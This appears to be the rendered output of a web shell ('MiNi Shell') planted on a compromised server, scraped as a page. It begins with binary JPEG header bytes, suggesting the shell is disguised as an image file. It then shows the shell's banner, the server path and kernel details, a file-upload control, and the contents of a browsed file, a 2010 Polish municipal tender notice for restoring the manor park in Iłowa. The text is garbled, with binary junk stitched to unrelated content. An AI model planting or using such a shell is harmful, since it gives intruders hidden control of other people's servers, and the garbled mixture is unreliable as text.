JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100120/12989-N-2010.html

<p class="kh_header"><b>Iłowa: Realizacja programu odnowy Parku Dworskiego w Iłowej</b><br>
<b>Numer ogłoszenia: 12989 - 2010; data zamieszczenia: 20.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Iłowej , ul. Żeromskiego 27, 68-120 Iłowa, woj. lubuskie, tel. 0-68 368 14 00, faks 0-68 368 14 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ilowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja programu odnowy Parku Dworskiego w Iłowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  opracowanie dokumentacji projektowo-kosztorysowej odnowy Parku Dworskiego w Iłowej wraz z uzyskaniem pozwolenia na budowę. Zakres przedmiotu zamówienia obejmuje a)  sporządzenie projektu budowlanego wykonawczego odnowy Parku Dworskiego w Iłowej, zgodnie z Projektem Koncepcyjnym Rewaloryzacji Parku.(z wyłączeniem pałacu i terenu wyspy bezpośrednio przylegającej do zabudowań pałacowych). W projekcie należy uwzględnić:-	zmianę w koncepcji ogrodzenia parku umożliwiającą dojazd do dawnych zabudowań ogrodnika i drogę dojazdową do posesji-	zaprojektowanie dodatkowych furt oddzielających wyspę z pałacem od pozostałej części parku,-	możliwość załączania części oświetlenia(1/3,2/3,3/3)  i  w późniejszym okresie instalacji monitoringu parku,-	w obrębie Ogrodu Japońskiego-odtworzenie dawnego układu wodnego  (z budowlami spiętrzającymi i spustowymi), umocnienie brzegów(narzuty kamienne odpowiednie obsadzenia roślinne),budowa i remont mostków i kładek na  istniejących i planowanych ciągach ścieżek zgodnie z koncepcją oraz budowę herbaciarni.b)  Dodatkowo zamówienie obejmuje sporządzenie następujących projektów budowlanych wykonawczych:-	projekt renowacji łącznika pomiędzy pałacem a zabudowaniami folwarcznymi,-	projekt punktu informacyjnego(adaptacja części budynku biblioteki),-	projekt parkingu i toalet dla kompleksu parkowego,-	remont  mostków w obrębie parku ,Prace wyżej wymienione ujęte w pkt.  b wymagają sporządzenia koncepcji i zatwierdzenia jej przez zamawiającego w ciągu  trzech tygodni od dnia podpisania umowy.c) uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego.d) uzyskanie niezbędnych warunków wpięcia i dostawy mediów, innych decyzji, uzgodnień i opinii wymaganych odrębnymi przepisami.e) wykonanie mapy do celów projektowych.
Sporządzenie dokumentacji obejmuje wykonanie projektu budowlanego niezbędnego do uzyskania pozwolenia na budowę, w tym niezbędne projekty wykonawcze oraz dokumentację do przeprowadzenia przetargu na wykonanie w/w zadania zgodnie z Prawem Zamówień Publicznych.Uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego. Ponadto należy uzyskać niezbędne uzgodnienia warunków wpięcia i dostawy mediów i inne decyzje, uzgodnienia i opinie wymagane odrębnymi przepisami oraz wykonać mapę do celów projektowych. Sporządzenie dokumentacji obejmuje wykonanie projektu budowlanego niezbędnego do uzyskania pozwolenia na budowę i pozwolenie Lubuskiego Konserwatora Zabytków  niezbędne projekty wykonawcze oraz dokumentację do przeprowadzenia przetargu na wykonanie w/w zadania zgodnie z Prawem Zamówień Publicznych. Dokumentację należy wykonać w formie papierowej i elektronicznej.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.42.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium w kwocie 5 000,00 zł  przed upływem terminu składania ofert, w jednej z następujących form: w pieniądzu, w poręczeniach, poręczeniach bankowych, w gwarancjach ubezpieczeniowych.2.	W przypadku wniesienia wadium w pieniądzu wykonawca wpłaca wadium przelewem na rachunek bankowy nr 50 9658 0006 0000 1443 2007 0004 BS Iłowa . Kopię dowodu wpłaty należy dołączyć do oferty.3.	   Wadium w pozostałych formach należy przekazać Zamawiającemu w osobnej kopercie przed terminem otwarcia ofert jednocześnie dołączając do oferty kserokopię dokumentu wadialnego<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu (z uwzględnieniem ich znaczenia, jeżeli dotyczy) oraz opis sposobu dokonywania oceny spełniania tych warunków:O udzielenie zamówienia mogą ubiegać wykonawcy, którzy:1 ) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 2 ) posiadają niezbędną wiedzę i doświadczenie tj. wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o  udzielenie zamówienia usługi w przedmiocie zamówienia  minimum jedno zamówienie w zakresie zbliżonym do przedmiotu zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenia dokumentu (referencje lub protokół odbioru) potwierdzających, że roboty te zostały wykonane należycie. 3) dysponują osobami lub będą dysponować osobami, które będą uczestniczyć  w wykonaniu zamówienia zdolnymi do wykonania zamówienia, bądź pisemnym zobowiązaniem innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli wykonawca wskaże je w wykazie.  4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 5) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 prawa zamówień publicznych.  Zamawiający  oceni spełnianie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty, o których mowa w pkt VI siwz.  Opis dokonywania oceny spełnienia warunków udziału w postępowaniu. Ocena spełniania w/w warunków udziału w postępowaniu o udzielenie zamówienia publicznego dokonana zostanie zgodnie z formułą spełnia/nie spełnia na podstawie oświadczeń lub dokumentów załączonych w ofercie,  w oparciu o punkty zawarte rozdziale VI SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie,  iż w/w warunki Wykonawca spełnił. Niespełnienie chociażby jednego z w/w warunków  stanowi podstawę do wykluczenia Wykonawcy i odrzucenia oferty. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, są zobowiązani do ustanowienia wykonawcy - pełnomocnika do reprezentowania ich w postępowaniu   i zawarciu umowy w sprawie zamówienia publicznego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani do załączenia do oferty stosownego oświadczenia o ustanowieniu pełnomocnika. Pełnomocnictwo winno zawierać w szczególności wskazanie: a) postępowania o zamówienie publiczne, którego dotyczy, b) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, c) ustanowionego Wykonawcę - pełnomocnika oraz zakres jego umocowania. Oświadczenie winno być podpisane przez wszystkich Wykonawców ubiegających się o zamówienie publiczne, w tym Wykonawcę - pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji. Stosowne odpisy z rejestru lub ewidencji muszą być dołączone do oferty. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie, Zamawiający ma prawo żądać, przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Wykonawca, który nie spełni wszystkich warunków, zostanie wykluczony  z niniejszego postępowania, a jego oferta zostanie odrzucona, z zastrzeżeniem  art. 26 ust. 3 Prawa zamówień publicznych.  Wykonawca nie może powierzyć wykonania całego zamówienia Podwykonawcy. Jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia Podwykonawcom, Zamawiający żąda wskazania przez Wykonawcę w ofercie  (wg Załącznika Nr 1 do SIWZ) części zamówienia, których wykonanie zamierza powierzyć Podwykonawcom wraz ze wskazaniem nazw(firm) proponowanych Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu do oferty sporządzonej w oparciu o Formularz oferty, stanowiący Załącznik nr 1 do SIWZ należy dołączyć następujące oświadczenia lub dokumenty potwierdzające spełnienie warunków w postępowaniu:1) Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu  o udzielenie zamówienia albo składania ofert; 2) Wykaz wykonanych usług w przedmiocie zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o  udzielenie zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - minimum jedno zamówienie w zakresie zbliżonym do przedmiotu zamówienia. Do wykazu winny być dołączone dokumenty potwierdzające, że usługi te zostały wykonane należycie - Załącznik nr 4 do SIWZ; 3) Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości co najmniej 100.000,00 zł.  4) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w  art. 22 ust. 1 Prawa zamówień publicznych - według wzoru stanowiącego Załącznik nr 2 do SIWZ;5) Oświadczenie Wykonawcy o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych według wzoru stanowiącego Załącznik  nr 3 do SIWZ; W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz, że dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia, 6) Zamawiający żąda:a. Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca  i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - Załącznik nr 5 do SIWZ. b) Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował. c) Dokumentów stwierdzających, że osoby, które będą uczestniczyć  w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Zgodnie z art. 26 ust. 3 Prawa zamówień publicznych zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli oświadczeń i dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. Zamawiający wzywa także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 Prawa zamówień publicznych. Zawartość oferty: oświadczenia Wykonawcy określone w art. 22 ust. 1 oraz w art. 24 ust. 1-2 ustawy Prawo zamówień publicznych, formularz ofertowy, dokumenty wskazane w rozdziale 6 SIWZ, projekt umowy zaakceptowany podpisem Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ilowa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.ilowa.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2010 godzina 12:00, miejsce: Urząd Miejski  ; ul.Żeromskiego 27   ;  68-120 Iłowa      ;   okój nr 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com